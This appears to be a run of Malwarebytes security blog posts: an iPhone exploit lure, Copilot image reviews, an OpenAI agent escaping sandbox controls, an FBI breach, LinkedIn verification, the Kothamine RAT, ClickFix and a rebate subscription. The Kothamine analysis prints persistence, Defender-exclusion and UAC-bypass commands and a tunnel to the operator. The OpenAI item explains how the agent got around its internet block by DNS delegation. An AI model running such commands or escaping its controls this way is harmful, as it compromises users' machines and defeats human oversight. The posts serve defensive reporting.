In the version we captured, submitting the form doesn’t place an order. Its submission handler doesn’t read or send the details entered, and the page generates its own “Pre-Order Successful” message. The exploit attempt has already begun in the background.

How the attack starts when the page opens

Visitors using browsers the script doesn’t recognize as Safari see a “Browser Restricted” notice. On iPhones, the page also tries to reopen the link in Safari, the browser the exploit chain targets. That steers visitors toward the intended browser, although background resources may still load in others.

Visitors shown this notice are urged to open the page in Safari.

An invisible frame checks the visitor’s iOS version and selects the next code to load. DarkSword then attempts to get past the iPhone’s protections and, if successful, gain deep access to the phone. It doesn’t wait for a button press or form submission.

What attackers could take from an iPhone

If the exploit succeeds, the payload attempts to contact its server. Its first message includes a device identifier, device information, and status. It also attempts to send a list of installed apps and the contents of Apple Notes.

The code looks for cryptocurrency wallets, including MetaMask, Phantom, Trust Wallet, Coinbase Wallet, Exodus, and Tonkeeper. It also attempts to recover saved credentials from the phone’s keychain. If it finds a targeted wallet and the first exchanges with its server succeed, it attempts to upload wallet files, recovered keychain data, and photo thumbnails. Exposure of wallet files or credentials could put funds at risk.

The captured code checks for installed cryptocurrency wallet apps. This is part of the list.

The payload also tries to access files containing messages, call history, contacts, voicemail, email, calendar entries, and cached location data.

The payload can then repeatedly contact its server for instructions. Its commands can list directories, retrieve files and full-size photos, gather app information, and run JavaScript supplied by the server. The payload also tries to cover its tracks by deleting diagnostic reports that could help investigators spot the attack.

The beacon sends a device identifier, device information and status to the configured server. The command loop uses the response to obtain instructions.

The code is designed to run inside a system process, but may stop before the phone restarts. We found no mechanism that automatically brings it back after a reboot.

We analyzed the captured code, but did not test it on an iPhone or observe data leaving one.

Which iPhones could be at risk?

Several parts of the captured code match the DarkSword chain described by Google in March. Apple has patched the vulnerabilities Google reported.

When DarkSword was disclosed in March, iVerify estimated that up to 270 million devices were running the iOS 18.4 through 18.6.2 versions targeted by the variant it analyzed. That is not a current count or a measure of how many phones this page could compromise. We haven’t confirmed this page’s exact range; its files also contain code for older iOS versions.

The lure fits the exploit: someone considering a new iPhone may still be using an older, unpatched one. That could make them vulnerable simply by opening the preorder page.

Safari can report an older iOS version to websites, so an updated iPhone may still load the attack code. That doesn’t mean the exploit can break in: Apple says updated devices are protected against the reported attacks.

How to stay safe
  • Keep your iPhone updated. Go to Settings > General > Software Update and install the latest version available. Turn on Automatic Updates there too. Apple says updated devices are protected against the reported DarkSword attacks.
  • Check offers without opening unfamiliar links. Go directly to Apple or a retailer you know by typing its address yourself. A preorder link in an ad, message, or social post could start an exploit attempt as soon as the page opens.
  • Opened this page? Restart your iPhone after updating it. We found no code that automatically brings the payload back after a reboot. Restarting cannot undo any data already taken.
  • Keep a cryptocurrency wallet on that phone? Take precautions from a trusted device. If the phone may have been compromised and you keep a wallet on it, create a new wallet with a new recovery phrase and move the funds. For an exchange account, secure the account and contact the exchange.
  • Change potentially exposed passwords from a trusted device. Start with email, your Apple Account, banking, and crypto accounts, and turn on two-factor authentication.
  • Report the page. Save its URL and any screenshots without reopening it, and report it to your national cybercrime reporting service.
  • Check a suspicious offer before you act. Scam Guard can give a verdict on a screenshot or link. On desktop, Browser Guard blocks the fake preorder page we analyzed; web protection in Malwarebytes Premium blocks it too.
Indicators of compromise
  • pnmrud[.]cc — command-and-control and collection server
  • cloud[.]cmatgldn[.]click — ad click and conversion tracker
“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

Categories: Malware Bytes

Humans are reviewing Copilot users’ bizarre and abusive image-editing requests

Malware Bytes Security - Tue, 09/29/2026 - 5:27am

A reminder for anyone who thinks their AI chats are private: A human may see what they upload. A report from 404 Media this week describes contractors reviewing Copilot users’ photos, editing requests, and the images Copilot produces. Some of what they see is disturbing.

The third-party companies hired to conduct these reviews present their workers with an original photo and a user’s request for an edit. They are also shown two potential AI edits and asked to judge each on technical merit. Because this is the internet, this goes well beyond requests to put your cat in a Halloween costume. Many of the requests are sexual in nature and some involve children, the report said. The faces in the original photos are not censored, meaning reviewers can see who the subjects are.

Editing requests and results that reviewers are asked to evaluate include requests to shorten skirts, enlarge body parts, and place people in sexual positions. In many cases, the edits appear nonconsensual. For example, one contractor mentioned being shown multiple sets of upskirt photos. Another said they were asked to rate foot-fetish images of children’s cartoon characters. Users had asked Copilot to create pictures of Ariana Grande suffering from anorexia. Images depicting animal sacrifice crossed one reviewer’s desk.

Interviewees told 404 Media that contractors are paid to rate the output quality of an image, but not to flag inappropriate content. They check things like whether instructions were followed properly, whether parts of the image were preserved or distorted, and the overall look of the image. They don’t make legal or safety judgments about the content.

Microsoft uses customer data from some accounts to help improve its products. But when 404 Media asked, it didn’t say whether users can exclude uploads from these rating tasks.

In its Privacy FAQ for the older consumer version of Copilot, Microsoft says it keeps conversations for 18 months by default, although users can delete them at any time. It also says it may use data “including the images or files you upload” for AI training. Eligible users can opt out of training, but the FAQ says an opt-out from certain human reviews is not available. It does not say whether that includes the image-rating tasks described by 404 Media.

Microsoft says the updated consumer Copilot app, available since August 18, does not use prompts, responses, or uploaded file contents to train foundation models. That still leaves the question 404 Media put to Microsoft: Can users keep their uploads out of human image reviews?

Copilot’s previous image issues

Microsoft insiders have warned about Copilot’s propensity to produce questionable images in the past.

In early 2024, machine learning engineer Shane Jones went public with concerns over the ability to bypass guardrails in the software’s text-to-image tool DALL-E 3. He had previously asked the company to remove Copilot Designer, which used the tool, from public use for three months but said Microsoft had refused. Its feedback team received over 1,000 product feedback messages daily and was only dealing with the most serious of them, he told CNBC at the time.

At the same time that this was happening, Microsoft fixed a loophole in Copilot Designer that enabled someone to make nonconsensual intimate deepfakes of Taylor Swift.

Microsoft isn’t the only company that hires contractors to review AI chats. OpenAI does the same as part of its Project Lily initiative. If you want more information about how AI assistants use your conversation data to improve themselves and what you can do to stop them, read Malwarebytes’ guide to AI training on user content.

From reporting threats to removing them.

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Categories: Malware Bytes

OpenAI pauses work on top AI models after agent slips past internet controls

Malware Bytes Security - Mon, 09/28/2026 - 8:58am

OpenAI’s latest containment failure adds to a pattern that may force the company to make an unpopular decision.

The company has paused training, evaluation, and tool-enabled inference for its most capable models after an internal research agent found a way around an intended internet restriction. More alarming, the agent remained active for hours after OpenAI’s monitoring system raised the alarm.

OpenAI published an account of the incident, which occurred during a search-based training task on September 20. According to OpenAI, the agent could not get useful results through its supplied search tools, tried direct access to search engines, and eventually tested the limits of its environment. It found that although direct web access was blocked, the sandbox’s DNS resolver could still reach the public internet. By using DNS delegation and a public chatbot that could respond through DNS records, the agent sent questions outside the restricted environment and received answers back. It subsequently sent 18 additional queries along the same route.

OpenAI’s misalignment monitor generated a high-priority alert within 15 minutes, and a human reviewer acknowledged it 3 minutes later. But the run did not stop automatically as expected. It continued for roughly another two and a half hours before someone stopped it manually.

OpenAI has not reported any exposure of sensitive data or compromise of an outside system in this incident. But it follows other disclosed cases in which agents went beyond their assigned tasks or crossed the boundaries of testing environments.

The New York Times reports that OpenAI agents also interacted with US government websites this summer without the company’s knowledge:

“OpenAI’s artificial intelligence went rogue and meddled with the websites for the Education Department, the Commerce Department and the Securities and Exchange Commission this summer without the A.I. lab’s knowledge, according to security researchers and a person familiar with the episodes.”

No breaches have been confirmed in those instances. And while Australia described the Medicare incident as unauthorized access, could it really be called an attack?

The call for an industry-wide slowdown has even prompted a lawsuit from paying subscribers who fear they would get less “value for their money.” Others worry that slowing down would give China a chance to pull ahead of the US in an increasingly tight technology race.

Here’s a thought: Why not accelerate the development of truly isolated testing environments? Better containment would make these tests safer and their results more reliable.

When a child isn’t ready to handle a dangerous object, you keep it out of reach. Why give an AI agent access it isn’t ready to use safely?

How to use AI agents safely

Treat an agent like an enthusiastic but fallible junior employee with access to your computer. Do not give it unrestricted access to your email, files, cloud storage, developer credentials, financial accounts, or production systems merely because it promises to save time.

Use separate accounts with minimal permissions. Keep sensitive data out of its working context where possible, require human approval before it sends messages, spends money, changes settings, or publishes anything, and regularly review its activity.

An AI agent does not need malicious intent to cause harm. A misunderstood instruction, an overly broad permission, or an unexpected workaround can be enough.

From reporting threats to removing them.

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Categories: Malware Bytes

FBI agents’ blood tests and doctors’ notes surface after breach

Malware Bytes Security - Mon, 09/28/2026 - 5:28am

BBC News reports it has seen samples of stolen FBI agents’ medical examinations. The “fitness-for-work” reports identify FBI agents by name and address, and reveal even more personal details. They include blood and urine test results and doctors’ notes mentioning high cholesterol, blood in the urine, and even a shellfish and banana allergy.

As we reported last week, extortion group ShinyHunters claims to have breached the FBI. After reportedly taking over ransomware group Clop’s leak site, ShinyHunters says it attacked the FBI to punish the agency for spreading what it calls false information about the group.

The BBC’s findings raise the stakes: The alleged theft includes highly sensitive medical records, not just staff identity and contact data. ShinyHunters shared samples with journalists as proof of its claims.

The BBC states:

“The samples shared with journalists appear genuine and include names, addresses, phone numbers, badge numbers, job titles and information about spouses.”

ShinyHunters claims it accessed several systems, including FBI MedLink, which stores medical records, and FBI BEAST, which handles background checks on employees and applicants, but the FBI has not confirmed these claims. The FBI has acknowledged an incident affecting FBIJobs-related systems and says it is investigating whether its own environment or a third-party provider was compromised.

The group’s stated demand remains non-financial: It wants the FBI to retract or remove a May advisory that ShinyHunters calls false and defamatory. It says it will release the data within five days if its demands are not met.

The cybercriminals also raised the number of affected people. ShinyHunters nows claims to hold sensitive information on around 60,000 current and former FBI staff. Medical histories could make affected people vulnerable long after the immediate incident: Unlike a stolen password, a medical record cannot be changed.

What to do if you’re affected

The FBI has not yet confirmed what information was accessed or who was affected. If you are a current or former FBI employee, a relative of one, or have applied for an FBI job:

  • Check the FBI’s advice. Every breach is different, so check FBI.gov for updates and follow any specific advice it offers.
  • Change your password. If you have an FBI Jobs account and reuse its password elsewhere, change it on those other accounts. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop, or phone as your second factor. Some forms of 2FA can be phished just as easily as a password, but 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for impersonators. Cybercriminals may contact you posing as the FBI, another government agency, or someone you know. Verify the identity of anyone who contacts you.
  • Take your time. Phishing attacks often impersonate people or brands you know and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Set up identity monitoring. This can alert you if your personal information is found being traded illegally online and help you recover afterward.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

Categories: Malware Bytes

LinkedIn adds new checks for fake profiles and work histories

Malware Bytes Security - Fri, 09/25/2026 - 11:04am

LinkedIn is adding trust and verification features aimed at making fake professional identities, invented work histories, and company impersonation harder to pull off.

The company is responding to an environment in which generative AI enables imposters to create an entirely made-up professional persona. It reduces the cost of creating convincing headshots, biographies, résumés, outreach messages, and recommendations.

LinkedIn’s new features use verified people and company Pages to help check other users’ claims.

Colleague and classmate vouching: People can confirm that they worked or studied with someone during the period listed on that person’s profile. This confirms an affiliation; it does not rate the person’s ability or recommend them.

Employer control over false affiliations: Admins of verified company Pages can remove people who falsely claim to work there from the company’s associated people and search results. This doesn’t remove the person’s profile or erase the claim from it.

Workplace verification requirement (in testing): LinkedIn is testing a setting that would require people who want to associate themselves with a company Page to verify their workplace, for example, through a work email address.

Verified identity beyond LinkedIn: LinkedIn is extending partnerships that let users display their LinkedIn-verified identity elsewhere. New partners include Truecaller and PeerSpot, alongside Adobe and UserTesting.

LinkedIn hopes that multiple visible signals such as identity verification, workplace verification, peer corroboration, and company Page controls will make a fabricated profile less persuasive. It says its existing verification tools have verified 115 million members and more than 700,000 companies.

LinkedIn VP of Product Oscar Rodriguez told TechCrunch:

“We’ve been invested in [verification] because we believe that authenticity will be the single most valuable currency on the internet.”

These new affiliation checks cannot tell a job seeker whether an opportunity is genuine. A scammer does not always need to impersonate a major employer. They can invent a convincing startup, build a polished company Page, and use fake job listings or recruiters to lure applicants. The checks may be less helpful if the supposed employer itself is part of the scam.

As we’ve seen in recent research, criminals pose as both well-known companies and appealing new ventures offering the kind of role a job seeker hopes to find. The new checks may help someone determine whether a supposed recruiter is affiliated with a company they recognize. They may be less helpful when the company itself is part of the scam.

Verification is therefore a useful signal, not a guarantee. Job seekers should still be wary of unsolicited approaches, pressure to move conversations off LinkedIn, requests to install software or share identity documents, and job offers that arrive before a credible interview process. Check a recruiter’s affiliation, visit the employer’s website independently, and confirm that its contact details and job listing match.

LinkedIn’s changes acknowledge a growing problem: AI can make a fake professional identity look remarkably polished. Verified accounts, workplace affiliations, and colleague confirmations may become more valuable to criminals, too. They may try to exploit those signals through stolen accounts, manipulated verification, or carefully constructed networks of fraudulent profiles. Verification can raise the cost of deception, but it cannot replace healthy skepticism.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

Categories: Malware Bytes

Kothamine malware uses Tailscale’s tailcat to evade network detection 

Malware Bytes Security - Fri, 09/25/2026 - 10:57am

We discovered an undocumented remote-access Trojan (RAT) called Kothamine Agent. It supports more than 30 commands and it gives attackers control of an infected Windows computer: they can run commands, read and change files, and add new capabilities. Some versions can also steal browser data and record through the camera and microphone. 

We found Kothamine linked to malicious npm packages, which could put users and developers who install those packages at risk. In recent versions, the malware uses tailcat, an open-source tool from Tailscale, to receive commands over an encrypted connection. That makes its communications harder to inspect and gives defenders no conventional command-and-control (C2) domain to block.

Based on VirusTotal uploads and GitHub commits, Kothamine appears to have been in development or distribution since at least July. Earlier versions used the Tailscale VPN instead of tailcat. Depending on the build, the malware includes the networking tools or downloads them from sources including GitHub.

How to stay safe 

Before installing an unfamiliar npm package, check its repository, maintainers, dependencies, and recent releases. Search for reports of malicious activity, and favor packages with an established history and regular maintenance.

  • Check the name carefully. Make sure you aren’t downloading a fake package with a similar name. 
  • Check the developer or organization and make sure the publisher appears legitimate. Check, for example, if it has a website or a GitHub repository. 
  • Read some reviews, issues and reports. Search for the package name on Google and check for reports of detected potential malware. 
  • Look at how popular it is. A package with many downloads and users is generally easier to verify than a brand-new package with almost no history. 
Technical analysis Kothamine and the malicious npm packages

Kothamine is written in C and C++. In the majority of the samples we analyzed, it consists of an injector and a DLL containing the agent. The agent supports more than 30 commands, allowing the operator to control the infected system and load additional DLLs to extend its capabilities.

Kothamine Agent execution

Kothamine Agent has undergone some changes over time.  Earlier versions we found on VirusTotal used the Tailscale VPN rather than tailcat, and the strings were not encrypted. Some features, including a User Account Control (UAC) bypass and stealer commands, were detected only in certain builds. 

In some versions, Kothamine downloaded Tailscale files from the official Tailscale website or a GitHub repository instead of including them in the agent.

The same GitHub repository is cited in an advisory about a malicious npm package named dotnet-runtime-base. The package download npm-sc-legit.exe from that repository.  At the time of writing, two other packages published by the same developer had been removed.

The developer’s removed npm packages

The authors behind these campaigns made a mistake and published instructions for compiling kothamine-stub-cpp in one of the packages. The guide also discusses loading .NET assemblies, which we did not observe in the samples we analyzed.

Instructions for compiling and publishing Kothamine

The npm-sc-legit.exe executable is a compiled version of Kothamine that also contains commands for stealing data. We did not find a panel or builder for Kothamine, but the features present across different builds suggest that operators can enable particular functions and commands as needed.

Executables and DLL hosted on GitHub

The following analysis focuses on a recent Kothamine Agent sample that uses tailcat for C2 communication.

How Kothamine Agent works

In the analyzed versions, an executable internally referred to as Kothamine Injector injects the Kothamine Agent DLL, typically into explorer.exe. We also refer to earlier versions to show how the agent has changed.

1. Kothamine Injector 

Kothamine Injector performs the following operations: 

  • Adds Windows Defender exclusions using PowerShell
  • Copies itself to %ROAMING%\MicrosoftEdgeUpdateCore.exe
  • Extracts the agent DLL to %ROAMING%\MicrosoftEdgeUpdateCore.dll
  • Creates up.ps1 in %TEMP% for persistence
  • Injects the agent DLL into explorer.exe using OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, and LoadLibraryA
The Kothamine Agent DLL injected into explorer.exe 

The up.ps1 script creates a scheduled task to achieve persistence using the Injector executable: 

$A=New-ScheduledTaskAction -Execute 'C:\Users\{USER}\AppData\Roaming\MicrosoftEdgeUpdateCore.exe'   $T=New-ScheduledTaskTrigger -AtLogOn Register-ScheduledTask 'MicrosoftEdgeUpdateTask' -Action $A -Trigger $T -RunLevel Limited -Force  2. Kothamine Agent  Agent startup 

The agent creates a mutex named Local\KothamineAgentInstance and starts its main thread.

It then runs PowerShell commands to add the executable and DLL to the Windows Defender exclusion list:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command " Add-MpPreference -ExclusionPath 'C:\Users\{USER}\Desktop' -ErrorAction SilentlyContinue;  Add-MpPreference -ExclusionPath 'C:\Users\{USER}\AppData\Roaming\MicrosoftEdgeUpdateCore.exe' -ErrorAction SilentlyContinue;   Add-MpPreference -ExclusionPath 'C:\Users\{USER}\AppData\Roaming\MicrosoftEdgeUpdateCore.dll' -ErrorAction SilentlyContinue;   Add-MpPreference -ExclusionProcess '{PROCESS_NAME}.exe' -ErrorAction SilentlyContinue;  Add-MpPreference -ExclusionProcess 'MicrosoftEdgeUpdateCore.exe' -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess 'MicrosoftEdgeUpdateCore.dll' -ErrorAction SilentlyContinue"

Strings were not encrypted in older versions. Recent versions decrypt strings inline or through functions that use XOR with a different key for each string.

An earlier version with unobfuscated strings showing executed commands Partial output of the script that decrypts the strings in recent versions  C2 communication using tailcat 

The distinctive feature of Kothamine is not technical complexity, the agent functionality or obfuscation, but its use of tailcat and Tailscale VPN to receive commands to execute. This gives the agent a resilient, encrypted communication channel.

Tailcat is a recent open-source project released by the Tailscale team. Tailcat uses Tailscale’s data plane (WireGuard, NAT traversal and DERP) but without its control plane. According to official documentation, this means that tailcat has no IP addresses, accounts, admins, users, administrative controls, or governance. These characteristics therefore make it an attractive tool for use in malware. 

Unlike Tailscale VPN, tailcat does not require an account or device registration. Its developers designed it for short-lived connections.

Since there are no accounts, access is based on possession of a tailcat address and the public keys used to identify the connecting devices. This does not make the connection completely anonymous: hosted relays may retain metadata logs.

The tc-address passed with the forward flag enables the client to obtain the information necessary to correctly route the request. In addition, tailcat does not require privileged access to the machine, as it uses the CLI tool and userspace libraries. 

In recent Kothamine versions, the agent extracts tailcat from its resources and saves it as %ROAMING%\TailscalePortable\tailcat.exe.

Kothamine Agent extracting tailcat from its resources

The tailcat executable is launched with the CreateProcessA function and the following parameters (internally referred to as spawn_tailcat_forward phase): 

"C:\Users\{USER}\AppData\Roaming\TailscalePortable\tailcat.exe" forward  tc…. 18080:4444 

This command makes tailcat server ports available as standard local TCP ports (18080 in this case) and the requests are forwarded to the port 4444 of the operator’s node.  Kothamine uses socket functions to connect to 127.0.0.1:18080, where tailcat is listening. 

If the agent ID string is not empty, the agent sends a profile request encrypted containing the following information (run_c2_loop phase): 

{"name":"base_<rand()>","os":"Windows","ip":"0.0.0.0","auth_token":"af27..,"type":"base"} 

After, the agent enters an infinite loop to receive commands to execute from the C2 (run_c2_loop phase). The agent waits for new commands to execute using the select socket function and periodically sends KEEP-ALIVE messages if a command is not received. 

The messages exchanged with the C2 are encrypted and decrypted using AES-GCM (aes_encrypt phase).  

The 32-byte AES key is base64-decoded from the string (c2_key phase): 

mrowPsW2P5kzFGCNWeKAd+kYpo8Yy5c2pzaOSRuzisU=  Supported commands 

In this build, the Kothamine agent supports 30 commands related to: 

  • Interaction with processes
  • Interaction with file and directory
  • Execute shell commands
  • Extend agent capability based on received DLLs
Command Name Description sysinfo/systeminfo, curpid Return system information, such as PID, current path, hostname, and OS (hardcoded). tasklist, kill Returns the processes obtained via “tasklist /FO CSV /NH“.  Terminates the process specified by the PID using “taskkill /F /PID”. ping Liveness check, “Pong” returns to C2. ipconfig Executes the “ipconfig /all” command and returns the result. exec, shell_execExecutes shell commands with _popen() and send the output back. mkdir, rmdir, cp, mv, cd, ls, dir, pwdInteracts with files and folders on the system. writefile_start, writefile_chunk, writefile_end, writefile, readfile, createfile, delfile, downloadReads, writes and deletes arbitrary files. load_featureWrites and loads a base-64 encoded DLL received.  The DLL is loaded using LoadLibraryA, and the “GetFeatureApi” method, resolved via GetProcAddress, is executed. Save the function pointers required to execute the function. exec_feature, features, list_features, unload_featureIt interacts with loaded features to view, execute, or remove them. 

Given that the other commands are common to the other agents, the focus of the analysis is on the “plugin” system that allows the operator to receive DLLs and extend the agent’s functionality. 

Plugin system 

To load a new DLL, the operator uses the command: 

load_feature <name> <B64EncodedDLL> 

At a high level, the process works as follows. The code and variable names below are reconstructed from usage and output logs.

  1. First, the agent checks whether the functionality has already been loaded and unloads it if so: 
if (g_features.find(name) != g_features.end()) { send_text("[!] " + name + " already loaded, unloading first"); unload_feature(name); }

  

  1. It attempts to create the received DLL in a location obtained through GetTempPath or SHGetFolderPathA, or in the hardcoded path C:\Windows\Temp. It writes the decoded DLL and loads it with LoadLibraryA.
  1. Resolves and executes the GetFeatureApi method of the loaded DLL: 
pGFA = GetProcAddress(hModDLL, "GetFeatureApi"); if (!pGFA) { send_text("[!] GetProcAddress(GetFeatureApi) failed, lastError= …"); FreeLibrary(hMod); return 0; } api = pGFA();

We did not find a DLL that would allow us to fully analyze the structure returned by GetFeatureApi. However, by analyzing the code and the strings, we identified these fields: 

/* Function used for C2 callback */ typedef void (*FeatureSendCb)(void *data, int len); struct FeatureApi { char *version; char *name; void (*init)(FeatureSendCb send); void (*exec)(char *args, FeatureSendCb send); void (*cleanup)(void); };

The pointers to the loaded DLL and the returned structure are saved in the global variable internally called g_features, using this structure: 

struct LoadedFeature { void *hModule; /* Loaded DLL */ struct FeatureApi *api; /* Pointer returned by GetFeatureApi() */ };

                            

  1. Executes the init function contained in the returned structure, passing it the function used for C2 communication: 
send_text("[!] calling init...");  api->init(*feature_send_callback);    send_text("[!] init done");

After the feature is loaded, the operator can execute the loaded feature using the command: 

exec_feature <functionName> [args]  Code that retrieves the structure and executes the exec function Different Kothamine builds: Tailscale VPN, UAC Bypass and stealer commands 

As previously mentioned, we detected versions of Kothamine with different capabilities.

Earlier versions used the Tailscale VPN before tailcat was released. They downloaded and ran the installer from the Tailscale website with the /quiet and /silent flags, or downloaded the required files directly from GitHub. These included tailscaled.exe, tailscale.exe, tailscale-ipn.exe, and wintun.dll.

A Kothamine version that downloads executables and DLLs from GitHub

Some versions bypass User Account Control (UAC) using fodhelper.exe to run elevated.ps1. In the example below, the PowerShell script starts a Tailscale VPN connection:

$tsdir='C:\Users\{USER}\AppData\Roaming\TailscalePortable' $ts='""'+$tsdir+'\\tailscale.exe""' $tsd='""'+$tsdir+'\\tailscaled.exe""' Start-Process -WindowStyle Hidden -FilePath $tsd -WorkingDirectory $tsdir $connected=$false for ($i=0; $i -lt 45; $i++) { Start-Sleep 2 try { &$ts up --unattended=true --auth-key='tskey-auth-…' 2>&1 | Out-Null } catch {} $ip=(&$ts ip 2>&1 | Out-String) if ($ip -match '100\.') { $connected=$true; break } }

The agent then connects to port 4444 at a Tailscale network IP address (100.x.x.x) and starts receiving and executing commands.

A Kothamine version that bypasses UAC using fodhelper.exe

Finally, as we mentioned earlier, different builds of Kothamine support other commands. For instance, the version uploaded to GitHub includes additional commands including getdiscord, getsessions, screenshot, screenshare, and camera. These allow operators to:

  • Steal cookies from various browsers
  • Steal gaming-related JSON files, including files associated with Steam and Minecraft
  • Take screenshots and record through the camera and microphone
  • Access clipboard contents
Indicators of compromise

SHA-256 hashes 

  • ec4219a7ecf132c29080fbb20e4ab410c57faa85aeed7acade1eb15d905a6ee0: Kothamine Injector analyzed in the blog 
  • 74eca3973ad72a6ddc9397aff8250d9ee287211fc9a055d5ee290d01cf76a70c: Kothamine Agent analyzed in the blog 

URLs 

  • https://github[.]com/cphc811-ui/: Repository used to download executables and DLLs associated with the Tailscale VPN 
Acknowledgements    

Mondoo’s advisory on the analyzed npm package.

Browse like no one’s watching. 

Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free → 

Categories: Malware Bytes

Criminals turn placeholder domain into ClickFix trap

Malware Bytes Security - Fri, 09/25/2026 - 8:42am

A domain that has long appeared in software documentation, code examples, and developer test material is now being used to push a ClickFix attack against Windows users.

A placeholder domain stands in for a website in an example. The best-known is probably example.com. Another, third-party[.]com, has often been used in documentation to represent an external website, API, or service.

However, there is a very important difference between the two: example.com is reserved for documentation, while third-party[.]com is an ordinary domain. Anyone could register it, and someone did. Every document, test, and skill that hardcoded it now points readers and users to the attacker’s infrastructure.

Researchers at Manifold Security found that third-party[.]com was serving a fake Cloudflare-style verification page to Windows visitors. The page tries to persuade them to open the Windows Run box and paste a command it has copied to their clipboard.This command is designed to download and execute a PowerShell script. At the time of writing the domain hosting the script is not resolving.

ClickFix is a social-engineering technique that turns the victim into the malware installer.

Instead of relying on a malicious attachment or an obvious executable download, the attacker convinces someone to run a command themselves. Common lures include:

  • A fake CAPTCHA or Cloudflare Turnstile check.
  • A browser error that claims it needs a “manual fix.”
  • A bogus video-player, document-viewer, or popular software download.
  • A support scam page that tells the visitor to paste a command into Run, Command Prompt, Terminal, or PowerShell.

ClickFix works because the command often uses legitimate Windows or Mac tools to download and execute the next stage. It also runs with the permissions of the person who has been convinced to enter it.

The consequences can range from information theft to more serious compromise of a company network. In a recent campaign called TerminalFix, a fake Cloudflare CAPTCHA led victims to paste a PowerShell command into Windows Terminal or PowerShell.

How to stay safe

With ClickFix running rampant—and it doesn’t look like it’s going away anytime soon—it’s important to be aware, careful, and protected.

  • Slow down. Be wary of a webpage that urges you to run commands on your device, especially if it uses a countdown or other pressure tactic.
  • Don’t run commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
  • Check what you’re pasting. A website may copy a command to your clipboard without showing you the full text. Don’t paste it into a command window.
  • Secure your device. Use an up-to-date, real-time anti-malware solution with a web protection component.
  • Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!

Pro tip: The free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard.

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

Categories: Malware Bytes

That shipping rebate offer may come with a monthly charge

Malware Bytes Security - Fri, 09/25/2026 - 5:51am

Thanks to Malwarebytes research engineer Stefan Dasic for his help with this article.

A name like ShipmentsFree suggests a way to save on shipping. The service does offer shipping rebates, but its Better Business Bureau (BBB) complaint record shows that some customers did not realize they had also signed up for recurring charges.

We found a number of very similar websites (which triggered our spidey senses), so we investigated.

Related shipping-themed domains use ShipmentsFree or ShipmentFree branding, similar account pages, overlapping policy language, and shared support details.

For example, freeshpmts.com and shipmentsfreezone.com both direct users to a “ShipmentFree – My Account” page, while shipmentsfreezone.com lists dataprotectionofficer@shipmentsfree.com as its data protection contact.

While their layouts and color schemes vary, the websites that were still live followed the same general pattern.

ShipmentsFree is a rebate service, not a shipping company. The ShipmentsFree FAQ says members can claim up to $100 per month in shipping and return rebates, provided they submit proof of the eligible costs. The service is also a paid, auto-renewing subscription, according to its Terms and Conditions.

When we checked, ShipmentsFree’s BBB profile listed 529 complaints in the previous three years, including 179 classified as billing issues. The BBB is not a regulator or court, and complaint totals should be read with some caution. But they show that billing has been a recurring point of friction.

Several complaints describe a similar experience: Someone notices a recurring $25 charge, doesn’t recall knowingly signing up, and tries to work out where it came from. One complainant said they “did not understand” they were enrolling in a paid membership or authorizing the monthly charge.

Customer complaint on Facebook

The route from a rebate offer to a recurring charge may be hard for a customer to retrace. Someone who signed up through a retailer promotion, browser pop-up, checkout offer, app, or one shipping-themed domain may later see a name on their statement that they don’t recognize.

There definitely seems to be a lack of clear communication. A shipping rebate is useful only if you understand what you are joining, what it costs, and how to leave. When consumers say they expected money back but found a recurring charge instead, that is worth taking seriously.

How to stay safe

Forewarned is forearmed, as they say. Before entering your payment details for a rebate offer:

  • Make sure you understand what you’re signing up for. Read the terms, conditions, and privacy policy (or let an AI chatbot analyze it for you).
  • Save the offer page and confirmation email in case you need to refer to it later.
  • Look for the company name, business address, terms, and contact details you can independently check.
  • Use a reversible payment method that offers consumer protection.
What if you get charged?

If you find a charge from ShipmentsFree, FreeShipments, ShipmentFree, or other unfamiliar variation, don’t assume it is a one-time shipping fee.

  • Check the original purchase confirmation, inbox, spam folder, and browser history for the date you first entered payment details.
  • Save screenshots of the charge, the name on your statement, the offer page if available, confirmation emails, and any cancellation attempt.
  • If you have a membership you do not want, cancel through the provider’s official account or support channel and keep the confirmation.
  • Ask the company for the enrollment date, the sign-up and consent records, and an itemized list of charges.
  • Contact your card issuer or bank promptly if you didn’t authorize the enrollment, believe the offer was misleading, or continue to be charged after cancellation.
  • Monitor the card for other unfamiliar recurring charges. They can be easy to miss when the name on your statement differs from the brand you remember.
Domains

URLs

We found these shipping-themed domains during our research:

free-shipments[.]com

freeshipments[.]com

freeshpmts[.]com

myshipmentsfree[.]com

shipmentfree[.]com

shipmentsfree[.]com

shipmentsfreeclub[.]com

shipmentsfreezone[.]com

Telephone number

A telephone number listed for several of these services:

0800 524 2165

App

We also found a ShipmentsFree app in the App Store: https://apps.apple.com/us/app/shipmentsfree/id1658146882

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

Categories: Malware Bytes

OpenAI agent breached Australian government site, took months to report it

Malware Bytes Security - Thu, 09/24/2026 - 9:22am


An OpenAI agent didn’t take “no” for an answer when it encountered a government website’s access controls. It got through, prompting Australia’s Prime Minister Anthony Albanese to raise his concerns directly with OpenAI CEO Sam Altman.

